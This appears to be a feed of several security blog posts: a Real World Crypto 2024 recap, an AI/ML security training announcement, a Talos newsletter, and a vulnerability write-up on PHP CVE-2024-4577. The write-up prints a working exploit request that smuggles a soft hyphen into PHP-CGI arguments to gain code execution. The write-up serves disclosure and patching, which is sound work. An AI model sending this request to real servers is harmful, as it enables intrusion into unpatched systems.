A number of NCC Group’s Cryptography Services team members attended the conference and several of the workshops this year. Some of our favorite talks and takeaways are summarized in this post.

Post-Quantum Cryptography

At this year’s Real World Cryptography conference, post-quantum cryptography was strongly represented. With two PQC sessions during the main conference itself, as well as the co-located RWPQC event which took place on the Sunday before the main conference, it was exciting to see so much engagement on the PQC front during our trip to Toronto!

Following the blueprint from last year’s event, the RWPQC workshop opened with an update about the NIST PQC competitions, which re-iterated the current status of the NIST PQC competition, and NIST’s goal of producing the final standards for NIST FIPS 203 and 204 drafts within the next few months, followed by an initial draft for the Falcon specification, under the name FN-DSA. This was followed by updates from other standardization bodies including ETSI, BSI, NSCS, and the IETF, which are all working towards providing PQC guidance in their respective areas of influence with the final FIPS drafts expected soon. MITRE and the Linux Foundation PQC migration consortiums both also gave updates during the workshop. As part of these talks, many standards bodies discussed their approach to the migration and whether or not they plan to mandate the use of hybrid algorithms, with approaches varying from required hybridization to less strong mandates on this front. Additionally, a number of the talks noted that while the use of hybrid algorithms may be helpful in the short term, the community should start considering eventual plans to migrate to a single set of algorithms post-hybridization, citing concerns about increased complexity or combinatorial expansion of algorithms as new algorithms get introduced in the future.

As a counterpart to the presentations by standardization bodies, the RWPQC program included real-world updates about the progress of the PQC migration at various companies, including Signal, Amazon, Google, Meta, and evolutionQ. All talks provided valuable insights as to the challenges, both already overcome and those that are yet to come, for migrating to PQC in their respective settings. Finally, a few more academic talks on lattice cryptanalysis and implementation footguns rounded off the program. We’ll do a slightly deeper dive for some of our favorite talks!

Lattice Cryptanalysis Talks

Martin Albrecht and John Schanck presented two complementary discussions on topics in lattice cryptanalysis. In the first presentation, Martin Albrecht did a deep dive into the analysis of the current best known attack for lattice cryptosystems, known as the dual attack, starting with a brief history of the primal and dual attacks, and noting some recent works that questioned the accuracy of some common heuristics, resulting in improved analyses for these dual algorithms. Martin also noted that there doesn’t seem to be a clear reason why the dual attacks appear to perform better than the primal attacks, noting that “it seems morally wrong that the dual attack would beat the primal attack”, since it introduces additional transformations over the direct approaches. Finally, the presentation concluded with a discussion of recent lattice attacks leveraging machine learning models, noting that in his opinion there is currently no reason to believe that ML can threaten lattice cryptosystems.

John Schanck’s following talk focused on the “real cost” of the best-known attacks. The NIST security levels I, III and V aim to guide protocol designers to select parameters which offer guarantees of security matching the cost of the best-known attacks against AES-128, 192 and 256 respectively. However, unlike attacks on AES, the dual-lattice attack has an incredibly expensive and memory-hungry sieving step. To make progress on an attack against Kyber and related schemes, one must perform a huge amount of computation before any progress is made on reducing the key-space (compare this to attacking AES where you can simply immediately just start guessing keys). The talk featured fun comparisons — a Moon’s weight of silicon would be needed to fabricate enough memory for the naive implementation of the dual-attack — and really demonstrated how challenging it is to align the real cost of attacking different cryptographic protocols when the attacks themselves are structured so differently at the algorithmic level. The take home message from Schanck’s talk was that when memory cost is taken into account, Kyber 768 should be enough for everyone.

Implementation Footguns for Post-Quantum Cryptography

Nadia Heninger presented a very detailed discussion about potential pitfalls she foresees as issues for post-quantum implementations, primarily based on her experiences with implementations of classical cryptography. She noted that many common classes of implementation pitfalls in classical cryptography are still applicable in PQC settings, including RNG issues, issues with sampling or uniformity of distributions (which may be even trickier in the PQC settings, as many lattice schemes require sampling from multiple distributions), API misuse, and missing validation checks, which can be tricky to enforce via tests. This talk resonated with us, as we have already started seeing some of these issues in the post-quantum projects that we have reviewed so far. Finally, her discussion noted that the increased implementation complexity for PQC schemes may be a blessing in disguise, as the more complicated an algorithm seems, the less likely people are to try to implement it themselves, and instead rely on existing implementations, which may end up helping avoid many of these potential issues at scale!

Making Signal Messenger Post Quantum / Making Encrypted Messaging Post Quantum

Rolfe Schmidt gave a fantastic talk on the upgrade to Signal messenger to begin the inclusion of post-quantum cryptography into the key-agreement stage of the protocol, now known as PQXDH. The talk motivated this change as a protection against “harvest-now, decrypt later” attacks with a design philosophy to change only what strictly needs to be changed to achieve protection against a quantum adversary. Although the key-agreement now includes a hybridized protocol using post-quantum algorithms, the Ratcheting algorithm is still classical only and so the classical guarantees of the Signal protocol are still not quite aligned with the post-quantum guarantees. Ensuring the ratchet is post-quantum secure is a work in progress of the Signal team, where they’re hoping to ensure that the performance of the messaging is not affected by the inclusion of Kyber into the ratcheting mechanism. The design documentation is now available PQXDH Specification

Additionally to the design and implementation of PQXDH, Signal collaborated with academia to produce a formally verified implementation of PQXDH using both ProVerif and CryptoVerif. Signal explained that through the process of formally verifying the protocol, they not only gained confidence in the changes, but verification also highlighted parts of the specification which had been under-described and could have led to attacks if misinterpreted. The process then not only added support for the validity of the design but acted as a guide for a robust description of PQXDH for developers in the future.

Conclusion

Overall, it’s very exciting to be seeing so much movement in the post-quantum real-world applications. We are looking forwards to future PQC updates at RWC, RWPQC and elsewhere, and to reviewing PQC projects that come our way!

– Giacomo Pope and Elena Bakos Lang

Key and Certificate Transparency

Key and certificate transparency was a hot topic at this year’s conference. The Levchin Prize was awarded to the team at Google responsible for “creating and deploying Certificate Transparency at scale”. In addition to the public recognition of what that work has pioneered, three talks were scheduled about different aspects of modern transparency solutions.

Invited talk: Key transparency: introduction, recent results, and open problems

The first talk by Melissa Chase from Microsoft Research delved into recent results and open problems in Key Transparency. In modern encrypted messaging deployments, a service provider is generally responsible for distributing users’ public keys. However, what if a man-in-the-middle attacker were to intercept (and meddle with) the public key of the recipient that a sender is trying to establish a secure communication with? Or worse, what if the server were to get compromised? In an end-to-end encrypted messaging setting, key transparency aims to solve this problem of trusted public key distribution which is often glossed over in academic works.

Until recently, the industry solution to the key transparency question was some form of out-of-band verification, in which users can display a fingerprint corresponding to the chat’s encryption key and compare it with one another. Subsequent deployments have made comparing these traditionally long numerical codes easier by displaying a QR code that can be verified when both users are physically close to each other. These solutions can be slightly tedious for users and the industry has started to deploy large-scale and automatic key transparency solutions based on relatively recent academic works such as CONIKS.

In some of these modern key transparency deployments, service providers provide a publicly accessible key directory which keeps track of users’ public keys. Users can then ensure that the key they hold for a given contact is consistent with the key tracked in the latest version of the online key directory. However, granting people access to public key repositories needs to be done while still maintaining user privacy. Indeed, the deployment of such systems should not make it easier for anyone to be able to track individual users’ actions, for example by figuring out when they refresh their keys (if they get a new device for instance) or by allowing attackers to find out which users are participating in the system by identifying personal information (such as phone numbers or email addresses) in the key directory.

In order to realize the goals outlined above, key transparency deployments make use of a few interesting cryptographic primitives. Service providers generally publish key directory together with a commitment to that directory. In practice, this is usually achieved with a Sparse Merkle Tree, and the commitment is the root of that Merkle Tree. In early academic proposals, the server would post a commitment to the current key directory at regular intervals. New developments (such as SEEMless) are proposing for the server to publish commitments to the incremental changes to the key directory, making the effort to audit the key transparency tree computationally lower (since the entire tree does not have to be recomputed and verified). To safeguard the privacy of users, modern key transparency deployments use Verifiable Random Functions (VRFs), which can be thought of as the public key variant of a hash function. In a VRF, only the private key owner may compute the hash output and its associated proof, but anyone can use the associated public key to verify that the output was calculated correctly. If the leaves of the Merkle tree were computed from the identifying information of users, for example by simply hashing some form of identifier, attackers could easily collect information about users. Using a VRF construction allows to conceal that information, by essentially randomizing the leaf positions in the Merkle tree. Melissa finished rounding up the literature review portion of her talk by presenting OPTIKS, a performant new key transparency solution which focuses on scalability, and which Melissa contributed to.

While many of the technical aspects of key transparency seem to be well ironed-out in theory, there are still a number of open questions and practical aspects that require further engineering efforts. To start, how to effectively instantiate the bulletin board, that publicly accessible key directory that should be efficiently and consistently accessed by users? A second crucial and often overlooked point is that of auditors. One common goal of these key transparency deployments is to provide the ability for auditors to validate the consistency of the key directory. But who are these auditors in practice, and what incentives do they have for performing costly validation work? And if they were to identify any wrongdoing, who would they even report such issues to? A third open question Melissa raised was around the security guarantees of such systems and whether stronger security notions could be obtained. For example, in current schemes, users will detect if a service provider maliciously replaces a user’s key but users themselves can’t prevent it.

WhatsApp Key Transparency

Later that day, Kevin Lewi and Sean Lawlor presented WhatsApp’s Key Transparency solution. Recent updates to WhatsApp added a feature to automatically validate users’ public keys based on a key transparency deployment following many of the concepts presented above. Previously, out-of-band verification used to be available to chat users, but automatic public key verification was recently added. Now, servers publish a commitment to the public key database, and, supported by UI updates in the app, the validity of a contact’s key is automatically checked when users access the “Encryption” menu of their contacts.

The presentation explored the different technical aspects this deployment necessitated, such as the infrastructure challenges to support these updates as well as the frequency at which they need to be updated. The speakers then presented some of the underlying cryptographic constructions used by the deployment. The system uses Sparse Merkle trees and VRFs in a fashion similar to SEEMless, and publishes incremental updates to the key transparency tree in the form of append-only proofs which are about ~200 MB each and are published at approximately 5 minutes intervals.

Kevin and Sean concluded their presentation by advertising the release of their implementation of the auditable key directory (accessible at https://github.com/facebook/akd), which is what WhatsApp uses in production for their key transparency deployment and which can also be used to verify the consistency proofs by external auditors. Members of NCC Group’s Cryptography Services team reviewed the implementation a few months before the conference; the public report can be found on NCC’s research platform: Public Report – WhatsApp Auditable Key Directory (AKD) Implementation Review.

Modern transparency logs

Finally, on the last day of the conference, Filippo Valsorda gave a talk on Modern Transparency Logs. Drawing parallels with key transparency solutions, Filippo kicked off his talk by framing transparency logs as a reusable primitive; a magic global append-only list of entries essentially defined by three fundamental questions: what are the entries, who can add them, and who monitors these entries? Different transparency solutions (such as the Go checksum database which Filippo used repeatedly as example throughout his presentation) are ultimately defined by the answers to these questions.

When building transparency logs solutions, a fundamental type of attacks that must be prevented is the ability to present different views of the system logs to different users, which is known as a split view attack. In a key transparency deployment for example, one could imagine a compromised (or rogue) server advertising a different public key for a target victim. There are a few solutions to circumvent split view attacks. A first one is to ensure local consistency (for example with an append-only log), a second measure is peer-to-peer gossip, where peers communicate amongst themselves to ensure they are being served the same system view, and finally, a third measure is witness cosigning. Witnesses are lightweight, third-party entities responsible for verifying consistency proofs between consecutive Merkle tree roots, and which will cosign that new tree head. Given a network of witnesses, more complex policies can be developed such as requiring a threshold of M-out-of-N signers in order for the tree head to be considered validated.

Filippo then proceeded to advertise a number of specifications and work-in-progress items to support modern transparency logs deployments. The first one being the checkpoint format specification, which is used to interoperate with the witness ecosystem. Checkpoints are essentially signed notes precisely formatted for use in transparency log applications, and which contain the origin of the checkpoint, the tree size and the root hash, and a number of potential co-signatures on that root hash. Recognizing that a checkpoint coupled with an inclusion proof is everything a client needs to verify an inclusion proof offline, Filippo then introduced the concept of “spicy signatures” (🌶️) which are offline verifiable proof of inclusion in a transparency log. He then concluded his talk by presenting a lightweight CLI tool and showing how spicy signatures can be used efficiently in existing deployments, for example by bringing transparency to the Debian package ecosystem in only a few hours.

– Paul Bottinelli

Symmetric Encryption

This year’s symmetric encryption session reinforced the motivations for modernizing our security requirements and design philosophy when it comes to symmetric primitives and modes of operation based on lessons learned and changing requirements over the past 20 years.

Building the Next Generation of AEAD

The symmetric cryptography session was opened by Sanketh Menda, who closed out last year’s event with a presentation on “context-committing” AEADs, or authenticated encryption with associated data, which acknowledges the need for standardized constructions that commit the complete “context” of an AEAD (e.g., the key and nonce). In his update this year, “Building the Next Generation of AEAD“, a broader set of goals was presented:

  • We sometimes need a fast approach for lightweight devices;
  • We sometimes need a suitable approach for cloud-scale data;
  • We sometimes need nonce-misuse resistance;
  • We sometimes need a nonce-hiding scheme;
  • And as established last time, we sometimes need context commitment.

And is there one ideal scheme to rule them all? Of course not… However, there may be a new approach to designing a family of schemes that facilitates safer use. To this end, a “flexible AEAD” construction is proposed which presents an implementer with a single set of binary choices corresponding to various security properties, thereby allowing a developer to express their intent, rather than to choose and compose various modes of operation. Sanketh then presents a series of primitives that can be composed in standard ways to achieve these various security goals.

With two excellent back-to-back presentations on the topic, I’m hoping we’ll get to hear a progress update from Sanketh again next year.

What’s wrong with Poly1305?

Jan Gilcher and Jérôme Govinden followed up with a presentation looking back on the development and deployment of Poly1305 and ask a fundamental question: “Given today’s advancements and applications would we still converge to this same design?”. This is initially motivated by observations that Poly1305 sacrifices a degree of security in favor of speed on a 32-bit platform using optimizations in the floating-point unit, whereas most modern platforms are 64-bit and leverage the arithmetic logic unit for optimized Poly1305 computations. So how would we build and optimize a Poly1305-like construction on today’s hardware?

Much like the preceding talk, the authors consider a modular construction for a family of polynomial-based hashes, from which Poly1305 and other similar schemes can be implemented based on a set of input parameters. This allows for the efficient testing and comparison of a broad family of implementations which can be tweaked between favoring security level and speed on a given platform. While such an approach does not outperform a hand-optimized implementation of a specific function, it appears to achieve impressive results based on the flexibility it provides.

Leveraging their new construction, the authors present a variant, Poly1163, which is better optimized for current hardware at a similar security level to Poly1305. Impressively, despite not being hand-optimized at all, this variant outperforms OpenSSL’s Poly1305 implementation. On the other end of the design spectrum, the authors also present Poly1503, which focuses on providing higher bit-security by not clamping inputs in the same manner as Poly1305 without a substantial hit to performance.

I want to encrypt 2^64 bytes with AES-GCM using a single key

Shay Gueron closed out the session with his presentation “I want to encrypt 2^64 bytes with AES-GCM using a single key“, which proposes a new mode of operation for AES called double nonce double key (DNDK), purpose-built to extend AES-GCM to support modern cloud-scale encryption tasks using a single key.

AES-GCM is the most widely used AEAD we encounter and is generally a safe choice for most applications when used correctly. However, GCM has a few well-known limitations: The 12 byte initialization value (IV) limits the number of invocations that can be made with a single key, and GCM out of the box does not provide key commitment, meaning that an attacker can produce a single authenticated ciphertext that decrypts to two different messages under two different nonce+key combinations. It is precisely these two problems that DNDK addresses, while striving to remain as close as possible to the GCM construction itself.

In practice, the concept is simple: If the short IV (nonce) is holding us back, then simply make it bigger, say, double its size. But a “double nonce” isn’t quite enough with GCM, since the first internal step is to hash it down to its original smaller size. Instead, we can use AES itself to build a key derivation function that takes as input the “double nonce” and the encryption key and derives an invocation-specific encryption key. In short, we use our double-nonce-derived-key to encrypt our message, and we have DNDK. And as a bonus, DNDK supports key commitment out of the box as well, as an optional output parameter. This incurs little practical overhead and does not rely on any additional cryptographic primitives to achieve its security.

Shay and friends at Meta have provided an optimized open-source implementation of DNDK-GCM, alongside implementations of AES-GCM and AES-GCM-SIV for comparison. A draft RFC has also been published to guide those wishing to implement DNDK for themselves. The Crypto Services team is proud to have supported the development of the DNDK draft RFC, with team members Gérald Doussot, Thomas Pornin, and Eric Schorn being formally acknowledged in the draft RFC.

– Kevin Henry

Real World Cryptography 2025

We look forward to catching up with everyone next year in Sofia, Bulgaria!

Announcing AI/ML safety and security trainings

By Michael D. Brown

We are offering AI/ML safety and security training in summer and fall of this year!

Recent advances in AI/ML technologies opened up a new world of possibilities for businesses to run more efficiently and offer better services and products. However, incorporating AI/ML into computing systems brings new and unique complexities, risks, and attack surfaces. In our experience helping clients safely and securely deploy these systems, we’ve discovered that their security teams have knowledge gaps at this intersection of AI/ML and systems security. We’ve developed our training to help organizations close this gap and equip their teams with the tools to secure their AI/ML operations pipelines and technology stacks.

What you will learn in our training

Our course is tailored for security engineers, ML engineers, and IT staff who need to understand the unique challenges of securing AI/ML systems deployed on conventional computing infrastructure. Over two days, we provide a comprehensive understanding of Al safety and security that goes beyond basic knowledge to practical and actionable insights into these technologies’ specific dangers and risks. Here’s what you will learn through a blend of instructional training and hands-on case studies:

  1. Fundamentals of AI/ML and cybersecurity: In this module, you will learn how AI/ML models/techniques work, what they can and cannot do, and their limitations. We also cover some essential information and software security topics that may be new for ML engineers.
  2. AI/ML tech stacks and operations pipelines: In our second module, you will learn how AI/ML models are selected, configured, trained, packaged, deployed, and decommissioned. We’ll also explore the everyday technologies in the AI/ML stack that professionals use for these tasks.
  3. Vulnerabilities and remediation: In this module, you will learn about the unique attack surfaces and vulnerabilities present in deployed AI/ML systems. You’ll also learn methods for preventing and/or remediating AI/ML vulnerabilities.
  4. Risk assessment and threat modeling: The fourth module covers practical techniques for conducting comprehensive risk assessments and threat models for AI/ML systems. Our holistic approaches will help you evaluate the safety and security risks AI/ML systems may pose to end users in deployed contexts.
  5. Mitigations, controls, and risk reduction: Finally, you will learn how to implement realistic risk mitigation strategies and practical security controls for AI/ML systems. Our comprehensive strategies address the entire AI/ML ops pipeline and lifecycle.

Equip your team to work at the intersection of security and AI/ML

Trail of Bits combines cutting-edge research with practical, real-world experience to advance the state of the art in AI/ML assurance. Our experts are here to help you confidently take your business to the next level with AI/ML technologies. Please contact us today to schedule an on-site (or virtual) training for your team. Individuals interested in this training can also use this form to be notified in the future when we offer public registration for this course!

No Way, PHP Strikes Again! (CVE-2024-4577)

No Way, PHP Strikes Again! (CVE-2024-4577)

Orange Tsai tweeted a few hours ago about “One of [his] PHP vulnerabilities, which affects XAMPP by default”, and we were curious to say the least. XAMPP is a very popular way for administrators and developers to rapidly deploy Apache, PHP, and a bunch of other tools, and any bug that could give us RCE in its default installation sounds pretty tantalizing.

Fortunately, for defenders, the bug has only been exploited on Windows-based PHP installations (where PHP is specifically used in CGI mode), under some specific locales:

  • Chinese (both simplified and traditional), and
  • Japanese.

However, Orange cautions that other locales could be affected too, and urges users to upgrade to the latest version of PHP, which fixes these bugs (for detail, see their blogpost).

We are keen to point out that we are unsure how common this configuration, or deployment type, is in reality. It is also not our job to find out, outside of our client base. But, regardless, it's an interesting vulnerability due to the root cause. Enjoy with us.

Orange's blogpost, while informative, doesn’t tell us exactly what to do to get that sweet RCE. Unfortunately, the wide range of configuration options makes it difficult to conclusively prove an instance to be vulnerable (or not) at a passive glance and, obviously, because a Windows machine's 'locale' is not typically externally fingerprintable. Because of this, we set about reproducing the bug—if we can exploit it, that’s the best way of proving exploitability, right?

Reading Orange's blog, it is clear that the bug only affects CGI mode of PHP. In this mode, the webserver parses HTTP requests and passes them to a PHP script, which then performs some processing on them. For example, querystrings are parsed and passed to the PHP interpreter on the command line - a request such as as http://host/cgi.php?foo=bar might be executed as php.exe cgi.php foo=bar, for example.

This does, of course, introduce an avenue for command injection, which is why input is carefully handled and sanitized before calling php.exe (cough CVE-2012-1823). However, it seems there is a corner-case which the developers did not account for, which allows an attacker to break out of the command line and supply arguments that are interpreted by PHP itself. This corner-case relates to how unicode characters are converted into ASCII. This is best explained with an example.

Here are two invocations of php.exe, one malicious and one benign. Can you spot the difference?

No Way, PHP Strikes Again! (CVE-2024-4577)

No, neither can I. Let’s look at then in a hex editor and see if that give us any clue.

No Way, PHP Strikes Again! (CVE-2024-4577)

Hmm, interesting - here we can see that the first invocation uses a normal dash (0x2D), while the second, it seems, uses something else entirely (a ‘soft hyphen,’ apparently), with the code 0xAD (highlighted). While they both appear the same to you and me, they have vastly different meanings to the OS.

An important detail here is that Apache will escape the actual hyphen - 0x2D - but not the second ‘soft hyphen’, 0xAD. After all, it’s not a real hyphen, right? So there’s no need to escape it… right?

No Way, PHP Strikes Again! (CVE-2024-4577)
We don't care if it's the same joke as above, it's still funny.

Well. It turns out that, as part of unicode processing, PHP will apply what’s known as a ‘best fit’ mapping, and helpfully assume that, when the user entered a soft hyphen, they actually intended to type a real hyphen, and interpret it as such. Herein lies our vulnerability - if we supply a CGI handler with a soft hyphen (0xAD), the CGI handler won’t feel the need to escape it, and will pass it to PHP. PHP, however, will interpret it as if it were a real hyphen, which allows an attacker to sneak extra command line arguments, which begin with hyphens, into the PHP process.

This is remarkably similar to an older PHP bug (when in CGI mode), CVE-2012-1823, and so we can borrow some exploitation techniques developed for this older bug and adapt them to work with our new bug. A helpful writeup advises that, to translate our injection into RCE, we should aim to inject the following arguments:

-d allow_url_include=1 -d auto_prepend_file=php://input

This will accept input from our HTTP request body, and process it using PHP. Straightforward enough - let’s try a version of this equipped with our 0xAD ‘soft hyphen’ instead of the usual hyphen. Maybe it’s enough to slip through the escaping?

POST /test.php?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1
Host: {{host}}
User-Agent: curl/8.3.0
Accept: */*
Content-Length: 23
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive

<?php
phpinfo();
?>
 

Oh joy - we’re rewarded with a phpinfo page, showing us we have indeed achieved RCE.

No Way, PHP Strikes Again! (CVE-2024-4577)

Conclusions

A nasty bug with a very simple exploit - perfect for a Friday afternoon.

Fortunately, though, patches are available, so we echo Orange Tsai’s advice to upgrade your PHP installation. As always, fantastic work and a salute to Orange Tsai.

Those running in an affected configuration under one of the affected locales - Chinese (simplified, or traditional) or Japanese - are urged to do this as fast as humanely possible, as the bug has a high chance of being exploited en-mass due to the low exploit complexity. Other users are still strongly encouraged to update:

For Windows running in other locales such as English, Korean, and Western European, due to the wide range of PHP usage scenarios, it is currently not possible to completely enumerate and eliminate all potential exploitation scenarios. Therefore, it is recommended that users conduct a comprehensive asset assessment, verify their usage scenarios, and update PHP to the latest version to ensure security.

We won’t duplicate the advisory here, instead, we advise those individuals seeking remediation advice to refer to the comprehensive advisory.

At watchTowr, we believe continuous security testing is the future, enabling the rapid identification of holistic high-impact vulnerabilities that affect your organisation.

It's our job to understand how emerging threats, vulnerabilities, and TTPs affect your organisation.

If you'd like to learn more about the watchTowr Platform, our Attack Surface Management and Continuous Automated Red Teaming solution, please get in touch.

The sliding doors of misinformation that come with AI-generated search results

The sliding doors of misinformation that come with AI-generated search results

As someone who used to think that his entire livelihood would come from writing, I’ve long wondered if any sort of computer or AI could replace my essential functions at work. For now, it seems there are enough holes in AI-generated language that my ability to write down a complete, accurate and cohesive sentence is not in danger. 

But a new wave of AI-generated search results is already turning another crucial part of my job and education on its head: search engine optimization. 

Google’s internal AI tool recently started placing its own answers to common queries in Google’s search engine at the top of results pages, above credible or original news sources. At first, this resulted in some hilarious mix-ups, including telling people they could mix glue into pizza sauce to keep cheese adhered to their crust, or that it’s safe to eat a small number of rocks every day as part of a balanced diet. 

While hilarious, I’m worried about the potential implications that these features may have in the future on misinformation and fake news on more important or easier-to-believe topics than topping your pizza with glue. 

There currently doesn’t seem to be a rhyme or reason to when these types of results do or don’t show up. Google recently announced several changes to its AI-generated search results that now aim to prevent misleading or downright false information on search queries that cover more “important” topics.  

“For topics like news and health, we already have strong guardrails in place. For example, we aim to not show AI Overviews for hard news topics, where freshness and factuality are important. In the case of health, we launched additional triggering refinements to enhance our quality protections,” the company said in a blog post.  

When testing this out firsthand, I got mixed results. For “hard” news topics, they aren’t displaying AI-generated results at all. For example, when I tried searching for topics like “Who should I vote for in the 2024 presidential election?” and “Does the flu vaccine really work?” 

But I did get one of the AI-generated answers when I searched for “When is a fever too high for a toddler?” The displayed answer told me to call a pediatrician if my child is older than three months and has a fever of 102.2 degrees Fahrenheit or higher. Parents’ experience in this realm will differ, but for whatever it’s worth, my daughter’s pediatrician specifically recommended to us not to seek emergency help until a fever has reached 104 degrees or lasts for more than 24 hours even with the use of fever-reducing medicine. 

The sliding doors of misinformation that come with AI-generated search results

Google’s AI also displayed information when I searched for “Talos cryptocurrency scams” to try and find one of our past blog posts. This summary was accurate, though it may have copy-pasted some text directly from press coverage of the Talos research in question — that’s a whole different issue that the journalist in me is concerned about. What was also interesting to me was that, when I entered the same exact search query the next day, the results page didn’t display this AI Overview. 

The sliding doors of misinformation that come with AI-generated search results

Bing, Microsoft’s direct Google search engine competitor, is also using its own form of AI-curated content to answer queries.  

My concern here is when or if these types of answers are generated for news topics that are already rife with misinformation — think elections, politics, public health and violent crime. Even a slight slip up from one of these language models, such as getting a certain number incorrect or displaying a link from a known fake news or satire site, could have major consequences for spreading disinformation. 

On last week’s episode of Talos Takes, Martin Lee and I discussed how the most convincing forms of disinformation and fake news are short, punchy headlines or social media posts. The average person is not as media literate as we’d like to think, and seeing a quick and easy summary of a topic after they type an answer into a search engine is likely going to be good enough for most users on the internet. It’s usually going above and beyond just to ask someone to click through to the second page of Google’s search results.  

AI’s integration into search engines could change the way many of us interact with the internet — I’ve been used to using Google’s search engine as my homepage since I was in middle school. At the risk of sounding hyperbolic, I don’t want to assume that this is going to be an issue, perhaps companies will sort all the issues out, or AI overviews won’t come for more serious news topics than general life questions. But so far, the results shouldn’t inspire much confidence. 

The one big thing 

Cisco Talos recently discovered a new threat actor called “LilacSquid” targeting the IT and pharmacy sectors, looking to maintain persistent access on victim’s networks. This campaign leverages vulnerabilities in public-facing application servers and compromised remote desktop protocol (RDP) credentials to orchestrate the deployment of a variety of open-source tools, such as MeshAgent and SSF, alongside customized malware, such as "PurpleInk," and two malware loaders we are calling "InkBox" and "InkLoader.”    

Why do I care? 

LilacSquid’s victimology includes a diverse set of victims consisting of information technology organizations building software for the research and industrial sectors in the United States, organizations in the energy sector in Europe and the pharmaceutical sector in Asia indicating that the threat actor (TA) may be agnostic of industry verticals and trying to steal data from a variety of sources. Talos assesses with high confidence that this campaign has been active since at least 2021. Multiple tactics, techniques, tools and procedures (TTPs) utilized in this campaign bear some overlap with North Korean APT groups, such as Andariel and its parent umbrella group, Lazarus — these are some of the most active threat actors currently on the threat landscape.  

So now what? 

LilacSquid commonly gains access to targeted victims by exploiting vulnerable web applications, so as always, it’s important to patch any time there’s a vulnerability on your network. Talos has also released new Snort rules, ClamAV signatures and other Cisco Security detection that can detect LilacSquid’s activities and the malware they use.  

Top security headlines of the week 

Several hospitals in London are still experiencing service disruptions after a cyber attack targeting a third-party pathology services provider. Some of the most high-profile healthcare facilities in Britain’s capital had to cancel or reschedule appointments or redirect patients to other hospitals. Lab services provider Synnovis confirmed the ransomware attack in a statement on Tuesday and said it was working with the U.K.’s National Health Service to minimize the effects on patients. This latest ransomware attack is illustrative of the larger cybersecurity issues facing the NHS, which manages a massive network of hospitals across the U.K. and has more than 1.7 million employees. In June 2023, the BlackCat ransomware group stole sensitive data from a few NHS hospitals and posted it on a data leak site. And just last month, a different group threatened to leak data from an NHS board overseeing a region of Scotland. The incident also forced other hospitals in the area to expand their capacities and operations to take on more patients, potentially stretching their resources thin. As of Wednesday afternoon, there was no timetable available for the resolution of these issues. (The Record by Recorded Future, Bloomberg

International law enforcement agencies teamed up for what they are calling one of the largest botnet disruptions ever. U.S. prosecutors announced last week that it dismantled a botnet called “911 S5,” arresting and charging its administrator as part of a global effort. The botnet reportedly infected more than 19 million residential IP addresses, using the compromised devices to mask cybercriminal activity for anyone who paid for access to the botnet. Adversaries had used 911 S5 for a range of malicious activities, including bomb threats, the distribution of child abuse imagery and the creation of fraudulent COVID-19 relief payments totaling more than $6 billion. The administrator, a People’s Republic of China native, is charged with creating and disseminating “malware to compromise and amass a network of millions of residential Windows computers worldwide,” according to a U.S. Department of Justice press release. The botnet was allegedly active between 2014 and July 2022. 911 built its network by offering a phony “free” VPN service to users, allowing them to browse the web while redirecting their IP address and protecting their privacy. However, the VPN service turned the target’s device into a traffic replay for the malicious 911 S5 customers. (U.S. Department of Justice, Krebs on Security

In a separate law enforcement campaign called “Operation Endgame,” law enforcement agencies from several countries disrupted droppers belonging to several malware families. Targets included IcedID, SystemBC, Pikabot, Smokeloader, Bumblebee and Trickbot. The coordinated effort between multiple European countries and the U.S. FBI led to four arrests of alleged malware operators and the seizure of more than 100 servers and 2,000 attacker-controlled domains. Eight Russian nationals have also been added to the list of Europe's most wanted fugitives for their alleged roles in developing the botnets behind Smokeloader and TrickBot, two of the most infamous malware families. Law enforcement agencies are also zeroing in on the person they believe to be behind the Emotet botnet, nicknamed “Odd.” "We have been investigating you and your criminal undertakings for a long time and we will not stop here," Operation Endgame warned in a video to threat actors. The investigation also found that the botnet operators had generated more than 69 million Euros by renting out their infrastructure to other threat actors so they could deploy ransomware. (Dark Reading, Europol

Can’t get enough Talos? 

Upcoming events where you can find Talos 

AREA41 (June 6 – 7) 

Zurich, Switzerland 

Gergana Karadzhova-Dangela from Cisco Talos Incident Response will highlight the primordial importance of actionable incident response documentation for the overall response readiness of an organization. During this talk, she will share commonly observed mistakes when writing IR documentation and ways to avoid them. She will draw on her experiences as a responder who works with customers during proactive activities and actual cybersecurity breaches. 

Cisco Connect U.K. (June 25)

London, England

In a fireside chat, Cisco Talos experts Martin Lee and Hazel Burton discuss the most prominent cybersecurity threat trends of the near future, how these are likely to impact UK organizations in the coming years, and what steps we need to take to keep safe.

BlackHat USA (Aug. 3 – 8) 

Las Vegas, Nevada 

Defcon (Aug. 8 – 11) 

Las Vegas, Nevada 

BSides Krakow (Sept. 14)  

Krakow, Poland 

Most prevalent malware files from Talos telemetry over the past week 

SHA 256: 9be2103d3418d266de57143c2164b31c27dfa73c22e42137f3fe63a21f793202 
MD5: e4acf0e303e9f1371f029e013f902262 
Typical Filename: FileZilla_3.67.0_win64_sponsored2-setup.exe 
Claimed Product: FileZilla 
Detection Name: W32.Application.27hg.1201 

SHA 256: 0e2263d4f239a5c39960ffa6b6b688faa7fc3075e130fe0d4599d5b95ef20647 
MD5: bbcf7a68f4164a9f5f5cb2d9f30d9790 
Typical Filename: bbcf7a68f4164a9f5f5cb2d9f30d9790.vir 
Claimed Product: N/A 
Detection Name: Win.Dropper.Scar::1201 

SHA 256: 5616b94f1a40b49096e2f8f78d646891b45c649473a5b67b8beddac46ad398e1
MD5: 3e10a74a7613d1cae4b9749d7ec93515
Typical Filename: IMG001.exe
Claimed Product: N/A
Detection Name: Win.Dropper.Coinminer::1201

SHA 256: a024a18e27707738adcd7b5a740c5a93534b4b8c9d3b947f6d85740af19d17d0 
MD5: b4440eea7367c3fb04a89225df4022a6 
Typical Filename: Pdfixers.exe 
Claimed Product: Pdfixers 
Detection Name: W32.Superfluss:PUPgenPUP.27gq.1201 

SHA 256: c67b03c0a91eaefffd2f2c79b5c26a2648b8d3c19a22cadf35453455ff08ead0  
MD5: 8c69830a50fb85d8a794fa46643493b2  
Typical Filename: AAct.exe  
Claimed Product: N/A   
Detection Name: PUA.Win.Dropper.Generic::1201 

How to Train Your Large Language Model

Large Language Models (LLM) such as those provided by OpenAI (GPT3/4), Google (Gemini), Anthropic (Claude) can be a useful tool to include when conducting security audits or reverse engineering; however, one of the main downsides of using these tools is the data you are reviewing is processed server side, meaning any data analyzed by the tool must be uploaded/sent to the server.

